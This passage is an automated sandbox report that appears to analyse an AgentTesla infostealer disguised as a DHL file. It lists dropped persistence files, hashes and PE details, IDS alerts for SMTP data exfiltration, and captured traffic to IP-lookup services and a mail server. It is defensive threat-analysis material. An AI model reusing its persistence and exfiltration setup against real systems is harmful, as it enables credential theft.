                                              MD5:C7A02A5B6394BF9114E1F12B2EB0BCAB
                                              SHA1:4841A38955D5AFA0FC893812089BB67A59063651
                                              SHA-256:3A457441E5445C4B4FE52FCA6A5B62C4C36BE9E3713389860D707BD32283FBEF
                                              SHA-512:471494AC9A59CFEB93393661DEEC03705E3754730E123E140F8991526CB6B0AEC90F39E62B3C633775F8BC3DF7465728DDA1A7BA43D6AC7491437F5492C7D04A
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                                              C:\Users\user\AppData\Roaming\uvbIwIYe.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\DHL_231437894819.bat.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):835080
                                              Entropy (8bit):7.689635791311562
                                              Encrypted:false
                                              SSDEEP:24576:XjlIhSPd+pl8v00qWGThl9oeg9adzlqmNd8kX:Xjl+SPspl8cVWGThl9MMdzl/Np
                                              MD5:5D1D0F26EBB26738D78E964C0A57DE2D
                                              SHA1:392ED434F12587A91368FB253F75FD6DFFBF25EA
                                              SHA-256:C01469EC1500B5BBB7ACE40F1823B41E0965607D4FA54497F3DFF82712C8070A
                                              SHA-512:E3400EF8655C994754FD4E75C5A3EBBB91A4C53638D079E1616D80DF0661EC3FB357CBDCCDC51D5BDD1A9B4B8AE5466DF6D7D70A3DC75831D353324A0BFE03EA
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 71%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4`g..............0..`...&......*~... ........@.. ....................................@..................................}..O.......("...............6........................................................... ............... ..H............text...0^... ...`.................. ..`.rsrc...(".......$...b..............@..@.reloc..............................@..B.................~......H.......d1...!...........S...*...........................................0...........(........}.....s....}.....r...p(....}.....~.... ....s....}.....{....o.... ......o......{.....o......{....o.....{....o......{.....{....o.....*f........s ...s!...("....*~..{....r...po......{....o#....*.0..}.........{....r9..po......+7...{.....|....o$...}....(%....{....o&.....{.....o........+.&..{....rS..po........&..{....rS..po........*...........>P..........>f.........}.....('.......s....}....

                                              C:\Users\user\AppData\Roaming\uvbIwIYe.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\DHL_231437894819.bat.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.689635791311562
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:DHL_231437894819.bat.exe
                                              File size:835'080 bytes
                                              MD5:5d1d0f26ebb26738d78e964c0a57de2d
                                              SHA1:392ed434f12587a91368fb253f75fd6dffbf25ea
                                              SHA256:c01469ec1500b5bbb7ace40f1823b41e0965607d4fa54497f3dff82712c8070a
                                              SHA512:e3400ef8655c994754fd4e75c5a3ebbb91a4c53638d079e1616d80df0661ec3fb357cbdccdc51d5bdd1a9b4b8ae5466df6d7d70a3dc75831d353324a0bfe03ea
                                              SSDEEP:24576:XjlIhSPd+pl8v00qWGThl9oeg9adzlqmNd8kX:Xjl+SPspl8cVWGThl9MMdzl/Np
                                              TLSH:E105D0C03F2A7701DE6CB934852ADDB862642E74B004B9E37EED2B57B6D91126E1CF50
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4`g..............0..`...&......*~... ........@.. ....................................@................................

                                              File Icon

                                              Icon Hash:37c38329a3924d33

                                              Static PE Info

                                              General

                                              Entrypoint:0x4c7e2a
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x676034AF [Mon Dec 16 14:09:51 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Authenticode Signature

                                              Signature Valid:false
                                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before, Not After
                                              • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                              Subject Chain
                                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                              Version:3
                                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                              Serial:7C1118CBBADC95DA3752C46E47A27438

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc7dd80x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x2228.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0xc88000x3608
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xcc0000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xc5e300xc60000e36ea1a438774298df790c3f9111043False0.8843944819286617data7.686508878932828IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0xc80000x22280x240099af528dc07f9a68d93b58dec4ca1d89False0.8845486111111112data7.3843062470544885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xcc0000xc0x2007f75d45b9e0380e3a5f2ff1f87d4c478False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_ICON0xc80c80x1e1fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9939048113085203
                                              RT_GROUP_ICON0xc9ef80x14data1.05
                                              RT_VERSION0xc9f1c0x308data0.45618556701030927

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-12-19T10:28:23.030175+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.1049718162.241.224.14587TCP
                                              2024-12-19T10:28:23.030175+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.1049718162.241.224.14587TCP
                                              2024-12-19T10:28:51.558509+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.1049718162.241.224.14587TCP
                                              2024-12-19T10:28:51.558509+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.1049718162.241.224.14587TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 19, 2024 10:28:36.208709002 CET49711443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:36.208739042 CET44349711104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:36.208826065 CET49711443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:36.229546070 CET49711443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:36.229567051 CET44349711104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:37.446626902 CET44349711104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:37.446935892 CET49711443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:37.450151920 CET49711443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:37.450165987 CET44349711104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:37.450437069 CET44349711104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:37.576486111 CET49711443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:37.619337082 CET44349711104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:37.900506973 CET44349711104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:37.900600910 CET44349711104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:37.900763988 CET49711443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:37.907370090 CET49711443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:38.053426981 CET4971280192.168.2.10208.95.112.1
                                              Dec 19, 2024 10:28:38.173093081 CET8049712208.95.112.1192.168.2.10
                                              Dec 19, 2024 10:28:38.173187017 CET4971280192.168.2.10208.95.112.1
                                              Dec 19, 2024 10:28:38.173309088 CET4971280192.168.2.10208.95.112.1
                                              Dec 19, 2024 10:28:38.292817116 CET8049712208.95.112.1192.168.2.10
                                              Dec 19, 2024 10:28:39.324820995 CET8049712208.95.112.1192.168.2.10
                                              Dec 19, 2024 10:28:39.503258944 CET4971280192.168.2.10208.95.112.1
                                              Dec 19, 2024 10:28:39.923830986 CET4971280192.168.2.10208.95.112.1
                                              Dec 19, 2024 10:28:40.043590069 CET8049712208.95.112.1192.168.2.10
                                              Dec 19, 2024 10:28:40.043684006 CET4971280192.168.2.10208.95.112.1
                                              Dec 19, 2024 10:28:40.331638098 CET49713587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:40.451740026 CET58749713162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:40.452176094 CET49713587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:41.626859903 CET58749713162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:41.627088070 CET49713587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:41.746820927 CET58749713162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:41.992829084 CET58749713162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:41.993706942 CET49713587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:42.115063906 CET58749713162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:42.362397909 CET58749713162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:42.362752914 CET49713587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:42.482423067 CET58749713162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:42.846374035 CET58749713162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:42.846599102 CET49713587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:42.966188908 CET58749713162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:43.212127924 CET58749713162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:43.218147993 CET49713587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:43.337618113 CET58749713162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:43.591236115 CET58749713162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:43.643934011 CET49713587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:44.385881901 CET49714443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:44.385910034 CET44349714104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:44.386012077 CET49714443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:44.390489101 CET49714443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:44.390501976 CET44349714104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:44.699876070 CET49713587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:45.602555037 CET44349714104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:45.602962971 CET49714443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:45.604352951 CET49714443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:45.604362011 CET44349714104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:45.604608059 CET44349714104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:45.659568071 CET49714443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:45.666615963 CET49714443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:45.707365990 CET44349714104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:46.044363976 CET44349714104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:46.044426918 CET44349714104.26.13.205192.168.2.10
                                              Dec 19, 2024 10:28:46.044480085 CET49714443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:46.048868895 CET49714443192.168.2.10104.26.13.205
                                              Dec 19, 2024 10:28:46.055499077 CET4971680192.168.2.10208.95.112.1
                                              Dec 19, 2024 10:28:46.175091982 CET8049716208.95.112.1192.168.2.10
                                              Dec 19, 2024 10:28:46.175201893 CET4971680192.168.2.10208.95.112.1
                                              Dec 19, 2024 10:28:46.175503969 CET4971680192.168.2.10208.95.112.1
                                              Dec 19, 2024 10:28:46.295875072 CET8049716208.95.112.1192.168.2.10
                                              Dec 19, 2024 10:28:47.324632883 CET8049716208.95.112.1192.168.2.10
                                              Dec 19, 2024 10:28:47.378366947 CET4971680192.168.2.10208.95.112.1
                                              Dec 19, 2024 10:28:47.891189098 CET4971680192.168.2.10208.95.112.1
                                              Dec 19, 2024 10:28:47.891666889 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:48.011226892 CET8049716208.95.112.1192.168.2.10
                                              Dec 19, 2024 10:28:48.011284113 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:48.011413097 CET4971680192.168.2.10208.95.112.1
                                              Dec 19, 2024 10:28:48.011440992 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:49.322812080 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:49.323024988 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:49.442462921 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:49.694004059 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:49.694305897 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:49.814169884 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:50.062462091 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:50.062719107 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:50.182267904 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:50.438704014 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:50.438916922 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:50.558516026 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:50.804887056 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:50.805187941 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:50.924838066 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:51.177762032 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:51.191715002 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:51.311264038 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:51.557792902 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:51.558374882 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:51.558509111 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:51.558553934 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:51.558602095 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:28:51.677970886 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:51.678014040 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:51.678174973 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:51.678227901 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:52.020623922 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:28:52.065849066 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:30:27.910811901 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:30:28.030400038 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:30:28.488471031 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:30:28.488715887 CET58749718162.241.224.14192.168.2.10
                                              Dec 19, 2024 10:30:28.488785028 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:30:28.488888025 CET49718587192.168.2.10162.241.224.14
                                              Dec 19, 2024 10:30:28.610132933 CET58749718162.241.224.14192.168.2.10

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 19, 2024 10:28:36.059040070 CET6547953192.168.2.101.1.1.1
                                              Dec 19, 2024 10:28:36.195799112 CET53654791.1.1.1192.168.2.10
                                              Dec 19, 2024 10:28:37.913604975 CET5007553192.168.2.101.1.1.1
                                              Dec 19, 2024 10:28:38.052536964 CET53500751.1.1.1192.168.2.10
                                              Dec 19, 2024 10:28:39.924717903 CET6546853192.168.2.101.1.1.1
                                              Dec 19, 2024 10:28:40.330636024 CET53654681.1.1.1192.168.2.10

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Dec 19, 2024 10:28:36.059040070 CET192.168.2.101.1.1.10x23a5Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Dec 19, 2024 10:28:37.913604975 CET192.168.2.101.1.1.10xca47Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                              Dec 19, 2024 10:28:39.924717903 CET192.168.2.101.1.1.10x66Standard query (0)mail.keeptraveling-eg.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Dec 19, 2024 10:28:36.195799112 CET1.1.1.1192.168.2.100x23a5No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                              Dec 19, 2024 10:28:36.195799112 CET1.1.1.1192.168.2.100x23a5No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                              Dec 19, 2024 10:28:36.195799112 CET1.1.1.1192.168.2.100x23a5No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                              Dec 19, 2024 10:28:38.052536964 CET1.1.1.1192.168.2.100xca47No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                              Dec 19, 2024 10:28:40.330636024 CET1.1.1.1192.168.2.100x66No error (0)mail.keeptraveling-eg.com162.241.224.14A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • api.ipify.org
                                              • ip-api.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.1049712208.95.112.1807048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 19, 2024 10:28:38.173309088 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                              Host: ip-api.com
                                              Connection: Keep-Alive
                                              Dec 19, 2024 10:28:39.324820995 CET175INHTTP/1.1 200 OK
                                              Date: Thu, 19 Dec 2024 09:28:38 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 6
                                              Access-Control-Allow-Origin: *
                                              X-Ttl: 60
                                              X-Rl: 44
                                              Data Raw: 66 61 6c 73 65 0a
                                              Data Ascii: false


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.1049716208.95.112.1802788C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 19, 2024 10:28:46.175503969 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                              Host: ip-api.com
                                              Connection: Keep-Alive
                                              Dec 19, 2024 10:28:47.324632883 CET175INHTTP/1.1 200 OK
                                              Date: Thu, 19 Dec 2024 09:28:46 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 6
                                              Access-Control-Allow-Origin: *
                                              X-Ttl: 51
                                              X-Rl: 43
                                              Data Raw: 66 61 6c 73 65 0a
                                              Data Ascii: false


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.1049711104.26.13.2054437048C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-19 09:28:37 UTC155OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                              Host: api.ipify.org
                                              Connection: Keep-Alive
                                              2024-12-19 09:28:37 UTC424INHTTP/1.1 200 OK
                                              Date: Thu, 19 Dec 2024 09:28:37 GMT
                                              Content-Type: text/plain
                                              Content-Length: 12
                                              Connection: close
                                              Vary: Origin
                                              cf-cache-status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 8f465d13dbf27292-EWR
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1997&min_rtt=1990&rtt_var=761&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1423695&cwnd=252&unsent_bytes=0&cid=3777f1ce7e43ddce&ts=464&x=0"
                                              2024-12-19 09:28:37 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                              Data Ascii: 8.46.123.189


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.1049714104.26.13.2054432788C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-12-19 09:28:45 UTC155OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                              Host: api.ipify.org
                                              Connection: Keep-Alive
                                              2024-12-19 09:28:46 UTC424INHTTP/1.1 200 OK
                                              Date: Thu, 19 Dec 2024 09:28:45 GMT
                                              Content-Type: text/plain
                                              Content-Length: 12
                                              Connection: close
                                              Vary: Origin
                                              cf-cache-status: DYNAMIC
                                              Server: cloudflare
                                              CF-RAY: 8f465d46bf8578ed-EWR
                                              server-timing: cfL4;desc="?proto=TCP&rtt=1963&min_rtt=1961&rtt_var=740&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1474747&cwnd=182&unsent_bytes=0&cid=7f54d317c868288f&ts=447&x=0"
                                              2024-12-19 09:28:46 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                              Data Ascii: 8.46.123.189


                                              SMTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Dec 19, 2024 10:28:41.626859903 CET58749713162.241.224.14192.168.2.10220-box5147.bluehost.com ESMTP Exim 4.96.2 #2 Thu, 19 Dec 2024 02:28:41 -0700
                                              220-We do not authorize the use of this system to transport unsolicited,
                                              220 and/or bulk e-mail.
                                              Dec 19, 2024 10:28:41.627088070 CET49713587192.168.2.10162.241.224.14EHLO 960781
                                              Dec 19, 2024 10:28:41.992829084 CET58749713162.241.224.14192.168.2.10250-box5147.bluehost.com Hello 960781 [8.46.123.189]
                                              250-SIZE 52428800
                                              250-8BITMIME
                                              250-PIPELINING
                                              250-PIPECONNECT
                                              250-AUTH PLAIN LOGIN
                                              250-STARTTLS
                                              250 HELP
